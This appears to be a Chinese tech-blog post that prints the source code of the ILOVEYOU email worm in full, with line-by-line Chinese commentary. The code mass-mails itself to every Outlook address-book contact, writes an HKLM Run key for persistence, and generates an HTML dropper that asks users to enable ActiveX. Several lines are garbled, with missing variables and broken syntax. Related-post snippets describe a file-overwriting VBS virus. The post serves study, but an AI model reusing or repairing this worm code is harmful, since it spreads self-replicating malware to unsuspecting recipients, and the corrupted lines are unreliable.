爱虫病毒源代码分析

最新推荐文章于 2025-06-02 17:25:16 发布
最新推荐文章于 2025-06-02 17:25:16 发布
阅读量1.2w 收藏 37
点赞数 14
CC 4.0 BY-SA版权
文章标签: 代码分析 vbscript microsoft function html generator
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/manio/article/details/1363114
本文深入解析了爱虫病毒的工作原理及传播方式。该病毒利用VBS脚本通过电子邮件附件进行传播,感染用户的Outlook地址簿并向联系人发送自身副本。此外,病毒还会创建一个HTML文件以进一步传播。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<!--
这是爱虫病毒的源代码,爱虫病毒通过邮件传播,但是只局限于outlook的用户,病毒作者通过邮件的内容引诱收件人打开邮件的附件。而事实上,附件是一个.vbs的vbscript脚本程序,当用户打开这个文件时,病毒找到计算机上的所有邮件地址,并把自己作为附件粘到附件里并发送出去。而且会把自己得复制到系统目录中,而且会修改注册表,做系统在启动时运行病毒代码。
 -->

<HTML><HEAD>
<Title> Help </Title></HEAD>
<Body> <script language='VBScript'> 
'========================
功能:读取注册表的值
参数:注册表键值键值位置
========================='
function regget(value)
Set regedit = CreateObject("WScript.Shell")   '新建一个Wscript.Shell对象,此对象可读取windows注册表值'
regget = regedit.RegRead(value)               'RegRead是Wscript.Shell对象读注册表的方法'
end function
'========================
功能:测试文件是否存在
参数:文件路径
返回值:存在返回0,不存在返回1
========================='
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then '如果文件存在msg=0否则msg=1'
msg = 0
else
msg = 1
end if

fileexist = msg
end function

'========================
功能:测试文件夹是否存在
参数:文件夹路径
返回值:存在返回0,不存在返回1
========================='
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

'==========================Sub spreadtoemail======================================='
sub spreadtoemail()
On Error Resume Next
dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad

set regedit = CreateObject("WScript.Shell")
set out = WScript.CreateObject("Outlook.Application"'创建一个OUTLOOK应用的对象 '
set mapi = out.GetNameSpace("MAPI"'取得MAPI名字空间 '
'===for 遍历整个mapi的地址列表=='
for ctrlists = 1 to mapi.AddressLists.Count
set a = mapi.AddressLists(ctrlists) 'a是邮件地址'
= 1
regv = regedit.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB" & a)

if (regv = ""then
    regv = 1
end if

if (int(a.AddressEntries.Count) > int(regv)) then
'=======for========'
for ctrentries = 1 to a.AddressEntries.Count
malead = a.AddressEntries(x) 'malead变量存放邮件地址,可能是因为病毒作者英文不太好,他可能本来是想写mailad(mail address)的'
regad = ""
regad = regedit.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB" & malead)

if (regad = ""then
    set male = out.CreateItem(0'新建邮件对象'
    male.Recipients.Add(malead)  '把邮件列表时的一个地址加到这个邮件的收件人里'
    male.Subject = "ILOVEYOU"    '“爱虫”的标志,邮件的主题是ILOVEYOU'
    male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."    'vbcrlf相当于回车符和换行符的组合,这一行是设定邮件的正文,引诱收件人打开邮件的附件'
    male.Attachments.Add(dirsystem & "LOVE-LETTER-FOR-YOU.TXT.vbs")   '把病毒自己附在邮件里'
    male.Send '发送邮件'
    regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB" & malead, 1"REG_DWORD" '把地址写入注册表'
end if

= x + 1
next
'======end of for======'

regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count
end if
next
'===========end of for=============='

Set out = Nothing
Set mapi = Nothing
end sub
'========================End Sub======================================='

'==========================Sub html===================================='
sub html
On Error Resume Next
dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6
'==========
下面这段是设定一个html文件,让病毒能通过浏览器传播,因为要注释,而下面又是一个单独的变量,所以会破坏变量
因为不能在变量中放置 / 双引号 单引号,所以要用一些符号替代,最后再替换回来
在下面 ?-?相当于/,@-@相当于双引号,#-#相当于单引号,^-^相当于,在后面会用replace()函数替换回来
==========='
dta1= "<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@
CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder(AT)mail.com ?-? @GRAMMERSoft '这里有一些病毒作者的信息,'
Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"   '病毒作者写给大家的话'
&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-    '当鼠标移出网页区域时,打开LOVE-LETTER-FOR-YOU.HTM(就是这个病毒文件)'
FOR-YOU.HTM#-#,#-#main#-#)@-"&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#    '当有键按下里时,打开LOVE-LETTER-FOR-YOU.HTM(就是这个病毒文件)'
-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this H
TML file
<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z-------
------------
-z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.mo
veTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2= "set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^Curre         '在电脑重启时运行病毒脚本'
ntVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1 = replace(dta1, chr(35& chr(45& chr(35), "'")                       '把几个变量中刚才的替代符号换回来'
dt1 = replace(dt1, chr(64& chr(45& chr(64), """")
dt4 = replace(dt1, chr(63& chr(45& chr(63), "/")
dt5 = replace(dt4, chr(94& chr(45& chr(94), "")                              
dt2 = replace(dta2, chr(35& chr(45& chr(35), "'")
dt2 = replace(dt2, chr(64& chr(45& chr(64), """")
dt3 = replace(dt2, chr(63& chr(45& chr(63), "/")
dt6 = replace(dt3, chr(94& chr(45& chr(94), "")
set fso = CreateObject("Scripting.FileSystemObject")
set c = fso.OpenTextFile(WScript.ScriptFullName, 1)                              '病毒自己打开自己,WScript.ScriptFullName是自己的路径'
lines = Split(c.ReadAll, vbcrlf)                                                  '把vbcrlf分开的部份放到lines数组中'
l1 = ubound(lines)                                                                'l1是数组上界'
for n = 0 to ubound(lines)                                                       '把几个变量中刚才的替代符号换回来'
lines(n)=replace(lines(n), "'"chr(91+ chr(45+ chr(91))
lines(n)=replace(lines(n), """"chr(93+ chr(45+ chr(93))
lines(n)=replace(lines(n), ""chr(37+ chr(45+ chr(37))
if (l1 = n) then                              '这个if没用'
else
end if
next
set b=fso.CreateTextFile(dirsystem + "LOVE-LETTER-FOR-YOU.HTM")                  '在复制自己到本机上,病毒的特点之一,先新建一个文件,再打开,把病毒代码写进去'
b.close
set d=fso.OpenTextFile(dirsystem + "LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines, vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
'==========================End Sub spreadtoemail======================================='
</script>
</Body></HTML> 

 
manio
关注
VBS病毒爱虫病毒源代码
miaozk2006的专栏
05-20 8631
说明:本人对某些代码进行了修改。该文件是一个完整的程序。该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。如果你的系统不支持.vbs,可以将后缀改为.vbe Dim folder, fso, foldername, ...
分析一款病毒程序
xiaoyuai1234的博客
07-04 1235
首先要谢谢吾爱的@Youngs提供的样本,我用自己的思路在分析一遍 首先对行为进行分析,发现他在运行本身的同时还释放了一个小程序 程序本身创建了开机自启动项 还原一部分代码如下: void AddReg() { char RegName[]="SoftWare\\Microsoft\\Windows \\CurrentVersion\\Run"; char szBu
VBS脚本遍历目录(递归调用)
06-07 1269
Set fso=createobject("scripting.filesystemobject") Set dc=fso.Drives For Each d in dc     If d.DriveType=1 or d.DriveType=2 Then        s=d.DriveLetter&":"        scan(s)     End If Next sub s
一些病毒代码
最新发布
a123456789zhz的博客
06-02 283
2.弹窗病毒:运行后会跳出来两个运行框,点击后会有几次系统警告,阻止操作后自动关闭。解法1:Ctrl键+Alt+Del键后打开任务管理器,运用光标控制键控制程序,关闭。3.鼠标乱飞病毒:运行后鼠标光标会自行来回飞舞,无法控制。解法2:如果解法1失败了,那么重启电脑……1.变色病毒:运行之后会不停的闪烁颜色。解法:连续点击“允许操作”,自行关闭。(以下代码仅限Dev-C++)
一个U盘病毒汇编源码分析
注重长远 天天积累 cqujsjcyj
09-12 578
      转自:http://bbs.pediy.com/showthread.php?t=74520     标 题: 【原创】一个U盘病毒汇编源码分析作 者: newjueqi时 间: 2008-10-12,20:28链 接: http://bbs.pediy.com/showthread.php?t=74520【文章作者】:  newjueqi  【作者邮箱】: zengjia...
熊猫烧香病毒源代码分析
WELFSDAF的博客
05-28 6692
“熊猫烧香”简介:“熊猫烧香”病毒是一个能在电脑操作系统上运行的蠕虫病毒。采用“熊猫烧香”头像作为图标。它的变种会感染EXE可执行文件,被病毒感染的文件图标均变为“熊猫烧香”。同时,受感染的计算机还会出现蓝屏、频繁重启以及文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。目前已有百万台电脑受害。 programJapussy; uses Windows,SysUtils,Classes,Graphics,ShellAPI{,Registry}; const HeaderS...
恶意代码浅析
Reveone的博客
09-20 1028
恶意代码的种类非常多,不仅仅是EXE可执行程序中可以携带恶意代码,office文档和脚本程序也可以携带恶意代码。对于恶意程序的分析,大体上和普通程序的分析方式一致。本文主要介绍各类型恶意代码的分析方法和一些经典的恶意代码分析实践。
计算机软件-商业源码-爱虫病毒分析及杀毒.zip
05-22
爱虫病毒分析及杀毒》是一份关于计算机安全领域的重要资源,主要涵盖了对爱虫病毒的深入分析以及相应的杀毒方法。爱虫病毒,全称为"ILOVEYOU"病毒,是2000年互联网上的一次重大安全事件,它通过电子邮件传播,对...
爱虫病毒源码分析与杀毒技术深度解析
资源摘要信息: "计算机软件-商业源码-爱虫病毒分析及杀毒.zip" 文件包含了对历史上著名的爱虫病毒的深入分析以及应对该病毒的杀毒方法和软件源代码爱虫病毒,全名为“ILOVEYOU”病毒,是一种通过电子邮件传播的...
QQ爱虫病毒清除工具使用教程与资源下载
1. QQ爱虫病毒清除工具:这是一种用于清除计算机系统中QQ爱虫病毒的工具。QQ爱虫是一种针对即时通讯软件QQ的计算机病毒,它会通过网络聊天工具传播。使用清除工具可以有效帮助用户解决病毒问题。 2. 清除原理:该...
vbs计算机病毒代码,vbs病毒的简单例子源代码解析
weixin_35985795的博客
07-28 1961
vbs病毒的简单例子源代码解析2007-03-26 00:00:00 作者:vbs病毒的简单例子源代码解析说明:作者对某些代码进行了修改。该文件是一个完整的程序。该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。如果你的系统不支持...
Iloveyou.github.io
03-30
Iloveyou.github.io
“I LOVE YOU”病毒原理
05-29
“I LOVE YOU”病毒原理分析介绍,了解相关的特征
QQ爱虫病毒清除工具
11-30
清除原理 结束病毒进程 结束wmimgr.exe与comime.exe进程 删除病毒文件 del "%SYSTEMROOT%\System32\slserv.exe" del "%SYSTEMROOT%\System32\slcsvr.exe" del "%SYSTEMROOT%\System32\slrundll.exe" del "%SYSTEMROOT%\System32\hookdll.dll" del "%SYSTEMROOT%\System32\wbem\dhelp.dll" del "%SYSTEMROOT%\System32\dhelp.dll" del "%SYSTEMROOT%\System32\wmimgr.exe" del "%SYSTEMROOT%\System32\comime.exe" del "%SYSTEMROOT%\System32\msinthk.dll" del "%SYSTEMROOT%\dhelp.dll" 修复注册表 [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExFilter] [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Select Server] [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mssysint] [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Management
QQ爱虫病毒
SingleWorld
06-11 2687
同事说,诺顿报警了.晕,又中毒了,这段时间,我要成为杀毒手了.来到他的电脑上,问他什么时候更新的病毒码,他说没更新过,唉,这样怎么可能不中毒呢,给他们千交待万交待了,将在线更新做好快捷图标放在桌面上,让他们最多两天点一次,就是不听话.呆会儿,我一定要做个任务,让每台电脑强制制执行这个更新程序.闲话少说,我迅速地将诺顿在线更新了一下,再进入安全模式下杀毒,病毒报告是W32.Qdens.A,将查出来的
博客摘录「 熊猫烧香病毒源代码分析」2023年6月30日
ROCKSTAR_HBD的博客
06-30 541
【代码】博客摘录「 熊猫烧香病毒源代码分析」2023年6月30日。
爱虫病毒】LOVE-LETTER-FOR-YOU.vbs 说明
2301_81066111的博客
12-18 429
蠕虫将自身的副本作为电子邮件的附件或指向其在网络资源上的文件的链接(例如,指向受感染网站或黑客拥有的网站上的受感染文件的 URL)发送。Email-Worms 使用许多不同的来源来查找受感染电子邮件将发送到的电子邮件地址: MS Outlook 中的地址簿 WAB 地址数据库 .txt存储在硬盘驱动器上的文件:蠕虫可以识别文本文件中的哪些字符串是电子邮件地址 收件箱中的电子邮件(一些 Email-Worm 甚至“回复”在收件箱中找到的电子邮件) 许多电子邮件蠕虫使用上面列出的多个来源。
尝试写些病毒代码
07-11 724
最近考试刚考完,没事学习写写病毒程序,当然仅作研究用,先写来个最简单的吧,avascript 内嵌在网页中执行你在打开网站时很多是内嵌了些javascript之类的脚本代码,可以不停打开窗口,让网页定格,不能打开其他网页,修改注册表之类,发送邮件,感染exe文件等等。把下面这个复制到记事本里保存,你有杀毒软件就可以检测到了。我的卡巴马上检测到了。这个叫"Trojan JS.LOOP" LOOP也就
计算机病毒 "爱虫"病毒(lovebug),有哪些是典型计算机病毒
weixin_36211244的博客
07-15 3201
有哪些是典型计算机病毒篇一:几种最常见的计算机病毒几种最常见的计算机病毒1.爱虫病毒(lovebug)“爱虫病毒是一种“蠕虫”病毒,前面说过“蠕虫”病毒主要就是通过占用内存和网络资源达到使网络瘫痪的目的。“爱虫”就是个典型的例子,它通过MicrosoftOutlook电子邮件系统传播,邮件的主题为“丨LoveYou”,包含一个附件(“Love-LcUcr-for-you.txt.vbs”)。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值